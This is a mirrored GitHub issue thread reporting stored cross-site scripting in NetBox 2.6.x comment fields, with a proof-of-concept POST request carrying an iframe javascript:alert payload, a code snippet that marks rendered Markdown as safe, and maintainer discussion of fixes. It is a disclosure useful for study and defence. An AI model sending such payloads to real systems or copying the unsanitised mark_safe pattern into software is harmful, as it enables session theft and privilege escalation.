starred/netbox
1
0
Fork 0
mirror of https://github.com/netbox-community/netbox.git synced 2026-01-11 21:10:29 +01:00
Code Issues 273 Packages Projects Releases 10 Wiki Activity

XSS possible through GFM-rendered fields #2845

New Issue
Closed
opened 2025-12-29 18:22:44 +01:00 by adam · 4 comments
adam commented 2025-12-29 18:22:44 +01:00
Owner
Copy Link

Originally created by @CloneAssassin on GitHub (Aug 31, 2019).

Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]

Environment

  • Python version: 3.7.4
  • NetBox version: 2.6.1 -2.6.2

Parameter:
name="comments" [ works on all pages where the parameter is present ]

PoC

POST /dcim/sites/add/ HTTP/1.1
Host: xxx
User-Agent: xxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: xxx
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 2158
Connection: close
Cookie: csrftoken=xxx; sessionid=xxx
Upgrade-Insecure-Requests: 1

-----------------------------57052814523281
Content-Disposition: form-data; name="csrfmiddlewaretoken"

xxxx

<snipped>

-----------------------------57052814523281
Content-Disposition: form-data; name="comments"
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

-----------------------------57052814523281
Content-Disposition: form-data; name="_create"

-----------------------------57052814523281--

XssGit

a cve will be requested

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Originally created by @CloneAssassin on GitHub (Aug 31, 2019). Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User] ### Environment * Python version: 3.7.4 * NetBox version: 2.6.1 -2.6.2 Parameter: name="comments" [ works on all pages where the parameter is present ] **PoC** ``` POST /dcim/sites/add/ HTTP/1.1 Host: xxx User-Agent: xxx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: xxx Content-Type: multipart/form-data; boundary=---------------------------57052814523281 Content-Length: 2158 Connection: close Cookie: csrftoken=xxx; sessionid=xxx Upgrade-Insecure-Requests: 1 -----------------------------57052814523281 Content-Disposition: form-data; name="csrfmiddlewaretoken" xxxx <snipped> -----------------------------57052814523281 Content-Disposition: form-data; name="comments" <IFRAME SRC="javascript:alert('XSS');"></IFRAME> -----------------------------57052814523281 Content-Disposition: form-data; name="_create" -----------------------------57052814523281-- ``` ![XssGit](https://user-images.githubusercontent.com/53221919/64010298-c7e7f800-cb19-11e9-810d-f35472b82ecc.PNG) a cve will be requested https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
adam added the status: acceptedtype: feature labels 2025-12-29 18:22:44 +01:00
adam closed this issue 2025-12-29 18:22:44 +01:00
adam commented 2025-12-29 18:22:44 +01:00
Author
Owner
Copy Link

@jeremystretch commented on GitHub (Sep 3, 2019):

This is known and expected behavior. There was some discussion a while back (though I can't find a GitHub issue for it) where we decided to allow raw HTML in comment fields. The logic was that since only authenticated users are permitted to post content, the risk would be acceptable for most use cases.

    html = markdown(value, extensions=['mdx_gfm'])
    return mark_safe(html)

I don't have a strong opinion on this either way: We can leave it as-is, or we can disable HTML entirely and leave only GitHub-flavored Markdown (GFM) rendering. What I don't want to do is start maintaining a whitelist/blacklist of HTML tags that should or should not be permitted. That's a lot of overhead and frankly overkill given the type of content intended to be stored in these fields.

@jeremystretch commented on GitHub (Sep 3, 2019): This is known and expected behavior. There was some discussion a while back (though I can't find a GitHub issue for it) where we decided to allow raw HTML in comment fields. The logic was that since only authenticated users are permitted to post content, the risk would be acceptable for most use cases. ``` html = markdown(value, extensions=['mdx_gfm']) return mark_safe(html) ``` I don't have a strong opinion on this either way: We can leave it as-is, or we can disable HTML entirely and leave only GitHub-flavored Markdown (GFM) rendering. What I **don't** want to do is start maintaining a whitelist/blacklist of HTML tags that should or should not be permitted. That's a lot of overhead and frankly overkill given the type of content intended to be stored in these fields.
adam commented 2025-12-29 18:22:45 +01:00
Author
Owner
Copy Link

@CloneAssassin commented on GitHub (Sep 4, 2019):

it is not clear to me why html component must be inserted in a comment function. An xss stored can lead to a privilege escalation, therefore the possibility to access administrative functions.

@CloneAssassin commented on GitHub (Sep 4, 2019): it is not clear to me why html component must be inserted in a comment function. An xss stored can lead to a privilege escalation, therefore the possibility to access administrative functions.
adam commented 2025-12-29 18:22:45 +01:00
Author
Owner
Copy Link

@jeremystretch commented on GitHub (Sep 4, 2019):

And yet, other users might need it. I'm not going to remove a piece of functionality from the application without some discussion. Hence the "gathering feedback" tag.

@jeremystretch commented on GitHub (Sep 4, 2019): And yet, other users might need it. I'm not going to remove a piece of functionality from the application without some discussion. Hence the "gathering feedback" tag.
adam commented 2025-12-29 18:22:45 +01:00
Author
Owner
Copy Link

@juan-vg commented on GitHub (Sep 19, 2019):

What about creating a new permission that allows users to use html or not (only markdown or whatever)?

@juan-vg commented on GitHub (Sep 19, 2019): What about creating a new permission that allows users to use html or not (only markdown or whatever)?
Sign in to join this conversation.
No Branch/Tag Specified
Branches Tags
Labels
Clear labels
beta
breaking change
complexity: high
complexity: low
complexity: medium
needs milestone
netbox
pending closure
plugin candidate
pull-request
Mirrored from GitHub Pull Request
 severity: high
severity: low
severity: medium
status: accepted
status: backlog
status: blocked
status: duplicate
status: needs owner
status: needs triage
status: revisions needed
status: under review
topic: GraphQL
topic: Internationalization
topic: OpenAPI
topic: UI/UX
topic: cabling
topic: event rules
topic: htmx navigation
topic: industrialization
topic: migrations
topic: plugins
topic: scripts
topic: templating
topic: testing
type: bug
type: deprecation
type: documentation
type: feature
type: housekeeping
type: translation
No Label status: accepted type: feature
Milestone
No items
No Milestone
Projects
Clear projects
No project
Assignees
Clear assignees
adam
No Assignees
1 Participants
Notifications
Due Date
No due date set.
Dependencies

No dependencies set.

Reference: starred/netbox#2845
Delete Branch "%!s()"

Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?